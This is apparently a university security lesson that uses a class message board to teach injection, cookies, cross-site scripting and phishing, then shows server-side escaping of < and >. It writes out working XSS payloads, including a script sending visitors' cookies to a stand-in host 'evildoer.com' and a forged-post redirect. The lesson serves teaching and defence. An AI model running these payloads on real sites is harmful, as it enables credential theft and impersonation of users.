Anatomy of our simple message board

Now that you've seen how forms and server-side scripts work, you've got all the tools you need to understand how the simple message board we've been using in class works, which is important because most non-trivial websites have the same basic architecture — just not in anywhere so simple a form.

The user goes to http://rona.cs.usna.edu/~smith/msg/mb.html and enters "Hello World!".

mb.html as rendered by browser	mb.html HTML code
Message Board	<html><body> <h1>Message Board</h1> <hr> <form action="mb.cgi"> <input type="text" name="msg"> <input type="button" onclick="submit()" value="post message"> </form> </body></html>

The user presses the post message button and the browser sends the server a "GET" request with URL
```
http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Hello+World!
```
The server executes the script mb.cgi with input Hello World!. The script modifies the file mb.html by inserting
```
<b>smith</b>: Hello World!
```
into the body of the HTML code. In other words, your message is inserted literally character-by-character, prefaced by your username (in bold).
The server then sends the browser simple HTML code that redirects it back to mb.html (i.e. document.location = http://rona.cs.usna.edu/~smith/msg/mb.html).

The browser displays the new version of mb.html.

mb.html as rendered by browser

mb.html HTML code

Message Board

smith: Hello World!

<html><body> 
<h1>Message Board</h1> 
<hr>
<b>smith</b>: Hello World!<br>
    <form action="mb.cgi"> <input type="text" name="msg"> 
      <input type="button" onclick="submit()" value="post message"> 
    </form> 
</body></html>

The one big difference between our simple message board and more sophisticated systems is that their server scripts send the user-data they receive to a database (a system for storing and retrieving data) rather than directly changing files in the server scripts. When the web server for such sites serve up pages to browsers, what's in the page depends on the information in the database.

It's important to understand this architecture for the following discussions, but it's also important because big complex sites fit the same basic pattern: The user enters data into a form on their browser, submitting the form sends data to the server, which executes a script that processes that data. The script actually changes files on the server, so that the next time a browser requests one of those files, the content received by the browser has changed.

Injection attacks

Since the message board includes whatever text we enter into the box literally, i.e. character-for-character, we can add a little spice to our posting. For example, if I (as user smith) post the message

I <u>hate</u> waking up early!

to the board, the result will be that anyone viewing the message board sees

I hate waking up early!

I could, for example, post an image by entering something like this:

Check out this picture <img src="http://social-context.org/wp-content/uploads/2011/08/skeptical-cat-is-fraught-with-skepticism1.jpg">

And you can post links, and other things as well. I could even, post a script! Suppose I posted the following "message":

<script type="text/javascript">var i = 0; while (i < 100) { document.write("GO NAVY! "); i = i + 1; }</script>

Injection Attack on a US Navy Site

Hackers hit a U.S. Navy website used to assist sailors and their families relocate to a new station. The site was vulnerable to an SQL injection attack, which enabled the attacker to gain login information for the site, including usernames, passwords, and email addresses.

Sometimes data sent in html forms are processed by a server that manages a computer database. If the form input data is not sanitized, a malicious user may be able to trick the database server into revealing some or all of its data by injecting database commands into the form. The language used to interact with databases is called Structured Query Language (SQL), which is why this type of attack is known as an SQL injection attack.

As a result of the attack, the targeted site was immediately shutdown and a few weeks later it was permanently retired.

When that's included in the message board, character-for-character, the result is that a browser rendering the page will insert 100 "GO NAVY!"s at the point of my message. Cute, right? The problem is, this opens up the door to allowing message board users to wreck havoc upon the poor little website. What if I put 1000000000 instead of 100 in the above "message"? What if while (1 == 1) in the above code rather than while (i < 100)? What if I posted

<script type="text/javascript">document.location="http://www.usma.edu";</script>

on the message board? All of these examples show that it is easy to take down the message board, i.e. render it totally inaccessible to anyone, by injecting code into the data that gets sent to the server. This kind of attack is called an injection attack for that very reason, and is a general kind of attack. In fact, we already saw an example of an injection attack when we tricked the guess-a-number game and were able to win in one guess every time. We'll look at several examples of how we can use injection attacks to do more subtle and devious things than just disable the page, and then we'll look at how we can protect a website like the message board against injection attacks.

Authentication and cookies

The message board is set up so that anyone may view it, but you can only post to it with a message board account. Moreover, everything you post is prefaced with your username, so we know who posts what. Authentication — verifying that you are who you say you are — is critical to providing security both in cyberspace and out. We'll discuss authentication in more detail later in the course, but authentication by username and password is something you should all be familiar with.

The obvious way (not the best way!) to do password protection is to have the usernames and passwords stored on the server, and have the user supply them when he asks for protected pages. But what if the whole site is supposed to be protected? One way is to have you provide your username and password every time your browser makes a GET request to the webserver. This is clearly too much of a pain in the neck for us users! Next simplest plan for password-authenticated websites: have your web-browser save your username and password on your machine, so that it can retrieve them and send them automatically with every request it makes to that webserver. That's how the message board works.

A better plan than storing the username and password in a cookie is to store a session key - a random number that serves as username and password for this session only. The session key gets stored locally as a cookie and is sent with every request to the server. This protects the actual password, so that someone who highjacks one session can't do it again.

Because neither the browser nor the user are likely to know how different webservers are going to work in this regard, the system is set up so that the server tells the browser what to store, the browser doesn't decide on its own.

The name for locally (i.e. on the browser's machine) stored information associated with a particular website is "cookie". Be aware that these are on your machine and could be misused by bad people. You can disable cookies in your browser, but then all sorts of sites won't work. (Yet another functionality vs. security trade-off!) You can also wipe the browser's cookie memory periodically.

IE10 to have "Do Not Track" enabled by default
Privacy is related to security, but not quite the same. Web browsing has tons of privacy implications — and not good ones. Web-sites and third-party businesses do a whole bunch of "tracking" of online behavior, and they are often able to put together a fairly comprehensive picture of your online activities. Think about that! Cookies and Javascript play a big role in doing that kind of thing. A new standard called "Do Not Track" proposes an extension to HTTP that allows browsers to send a "do not track" request within a regular GET. It only amounts to asking politely, but many well-known websites have pledged to honor these requests. Firefox, Safari and Opera allow uses to turn "do not track" on, it's not the default. Microsoft made big news this summer by announcing that "do not track" would be enabled by default in IE10, the next release of Internet Explorer.

The cookie for page with URL X gets sent with every request to a page in the subtree rooted X's directory. That way you don't have to reenter username and password for each page in a site. Cookies are sent in the HTTP traffic as part of the "GET" request, but not in the URL, simply as additional HTTP info. This is what an HTTP "GET" request with cookies looks like.

Reflection

Javascript code can access the cookie for the current page with the variable document.cookie. Thus, the code alert(document.cookie) inserted into the message board by any one user will cause everyone who looks at the page to see their own cookie. Because the cookie you see depends on who's viewing the code, not who posted the code. It's like a mirror, in a way.

This point is really important, so let's be concrete with an example. Suppose we have users m16XXXX, m16YYYY and m16ZZZZ with passwords rab, foo and bar respectively. User m16XXXX posts

<script type="text/javascript">alert(document.cookie);</script>

to the message board. Now that script is embedded in the message board, i.e. it is client-side script that will be executed by the browser of anyone visiting the message board. Next suppose user m16YYYY visits the message board. Her browser executes the script code put there by m16XXXX and up pops an alert box that says:

	  uname=m16YYYY&pswd=foo

... because her browser has her cookies. Next suppose user m16ZZZZ visits the message board. His browser executes the script code put there by m16ZZZZ and up pops an alert box that says:

	  uname=m16ZZZZ&pswd=bar

... because his browser has his cookies.

Cross Site Scripting (XSS)

If we combine injection and reflection we get an example of what's called a cross site scripting (XSS) attack. Let's look at an example using the message board. Suppose we have message board users m16YYYY and m16ZZZZ with passwords foo and bar respectively. An evildoer, Midn m16XXXX perhaps, creates a webpage the following script embedded in it:

<script type="text/javascript">document.location="http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Die+Bart+die!";</script>

If he can trick m16YYYY into visiting his webpage, and she happens to have logged into Prof. Smith's message board page already during that browser session, then here's what happens:

Midn m16YYYY's browser executes the script on the evildoer's webpage
The script causes the browser to send a GET /~smith/msg/mb.cgi?msg=Die+Bart+die!" request to the server rona.cs.usna.edu. Since m16YYYY has a cookie for that page (from having logged in previously), her cookie — containing her username and password — gets sent to the server rona.cs.usna.edu.
The server rona.cs.usna.edu receives the GET request with m16YYYY's username and password, and so inserts the message "Die Bar die!" prefaced with m16YYYY's username.

So now there is a message board post from m16YYYY threatening this poor Bart person. Of course m16YYYY didn't cause the post to happen, the evildoer m16XXXX did that. But there's no way to tell that fact from the perspective of the message board and the message board webserver rona.cs.usna.edu. The GET request that caused the message to be posted was sent from m16YYYY's browser with her username and password, just as if she'd typed it in the message board webpage herself.

The essence of this kind of attack is that the evildoer sets things up so that the victim's browser executes a script, and that means the script runs with the credentials (username/password in this case) of the victim. It might not seem that serious when we're just attacking the message board. However, what if we did a similar thing with a bank account rather than a message board, and instead of posting a threat we tricked the code we sent caused funds to be transfered?

Teach a man to phish ...
Phishing is very common. In fact, even though your e-mail account has spam filters that try to detect phishing e-mails and block them from appearing in your inbox, you're very likely to see one now and then. Check out The SI110 SPAM Page for some examples of SPAM that's made it into USNA inboxes.

Email and XSS, Phishing and Spear Phishing

The big problem for the evildoer in the previous example is how to get the victim to visit the webpage he's created that contains the script. One way is through an e-mail that contains a link to the evildoer's website.

A Phishing approach is to send out a blanket e-mail to a large number of people hoping that, out of all of them, someone will click on the link and happen to be logged in to the message board at the time. You try to make the e-mail enticing or make it look legitimate, but your real hope is that out of enough people you'll find that someone.

A Spear Phishing approach is to identify one or a small number of targets, do some research on them (e.g. check facebook, twitter, company websites, etc), and craft an e-mail based on that knowledge that they're especially likely to accept as legitimate and, therefore, for which they're likely to click on the link to the evildoer's website.

Of course if an e-mail client (i.e. a program for reading e-mail) runs scripts embedded in HTML-formatted e-mail, we don't need the victim to click on anything: we could simply embed a script in the e-mail that sets document.location to the evildoer's website. In that case, merely opening the e-mail would send you to the site. For this reason, most e-mail clients refuse to run Javascript embedded in an e-mail. Hopefully you now see why!

An effective attack on the message board

In class, along with the other attacks above, your instructor (acting as the evildoer) ran a really effective attack on the message board. It went something like this:

The evildoer has his own webserver at www.evildoer.com

The evildoer posts to the message board a message like this:

Here's a nice picture: <script type="text/javascript">document.write('<img src="http://www.evildoer.com/kitten.jpg?' + document.cookie + '">');</script>

The innocent Midshipman m16YYYY (password foo) logs into the message board and pulls it up. In rendering the message board, m16YYYY's browser executes the code in the script, which inserts the img element:
```
<img src="http://www.evildoer.com/kitten.jpg?uname=m16YYYY&passwd=foo">
```
... into the body of the message board's HTML code.
Midshipman m16YYYY's browser sends the request to www.evildoer.com to GET the file /kitten.jpg?uname=m16YYYY&passwd=foo
The evildoer's webserver receives this GET request and, like all GET requests to the server, it gets saved in the webserver logs. The evildoer's website will still send back a nice picture of a kitten, but the damage will have been done.
Finally, the evildoer checks his webserver logs and finds
```
GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1
```
and, lo and behold, he has m16YYYY's username and password!

This attack is quite mean, because from m16YYYY's perspective, nothing seems to be wrong. She saw a nice picture of a kitten, and that's all. No hint that now the evildoer has her username and password.

Protecting against injection attacks: sanitizing input

We've seen a lot of nasty things in this lesson (and even in some previous lessons) that can be done with injection attacks. It's time to ask what we can do about it? How can we protect ourselves? Fundamentally, we can't just take input from a user (in this case the "message" they want to post) and stick it into our message board. Instead, we have sanitize the input. That means remove or render harmless anything that might cause trouble. Sanitizing input is a huge issue in practice, precisely because the risk of injection attack is so high.

Here's the sledgehammer approach to sanitizing our message board input: You can't have any HTML or embedded Javascript code without < and >, so if we escaped those characters before putting the message into the message board, nobody could do an injection attack. There are a variety of ways to escape them, but since their ASCII values are 60 and 62, the following works: replace < with < and > with >. Here's a little bit of Javascript code that does it. Assuming you have a variable msg that has the original message, this creates variable newmsg that has the same string except that all the <'s have been replaced with <'s, and all the >'s have been replaced with >'s.

Consequences of poor input validation.
Validating input is always crucial and, in fact, security is just one example of why. There are lots of instances of poor input validation causing serious problems without any malicious attacker being involved.

1999 NASA: The $328 million Mars Climate Orbiter was sent into the Mars atmosphere on the wrong trajectory, causing it to disintegrate. The cause: one piece of software assumed it received input in metric units (newton-sec), but was sent data in English units (pounds-sec).

2001 Multidata Systems: Cancer treatment software calculated radiation dose based on a user-input configuration of lead shielding blocks. Calculations assumed no more that four shielding blocks were used, but the software allowed data for five blocks to be entered. The result: Cobalt-60 gamma radiation overdosing, an unknown number of deaths, and three radiation physicists charged with second-degree murder.

var newmsg = "";
var count = 0;
while(count < msg.length)
{
  var nextChar = msg[count];
  if (nextChar == "<")
    newmsg = newmsg + "&#60;";
  else
    if (nextChar == ">")
      newmsg = newmsg + "&#62;";
    else
      newmsg = newmsg + nextChar;
  count = count + 1;
}

Now, would this code be run on the client or on the server? Hopefully by now you realize that it must run on the server, because a bad person could contrive to send the HTTP GET request to the server without going through the client-side validation (just as we saw with server side scripts in the last lesson).

The above approach does secure us from injection attack, but that security comes at a cost. We can no longer use any HTML in our message board postings. That means no posting pictures, no using italics and bold face, and no links. The real trick is to sanitize the input in such a way that we're safe from the bad stuff, but users can still have the power and flexibility to post things like pictures, links, etc. It's a difficult job, however. One of the things you should have walked away from the programming part of the course appreciating is that it's hard to write a program that anticipates all the kinds of inputs that a dumb, sloppy or malicious user might throw at you.

Summary of injection attacks and cross-site scripting

(Read this)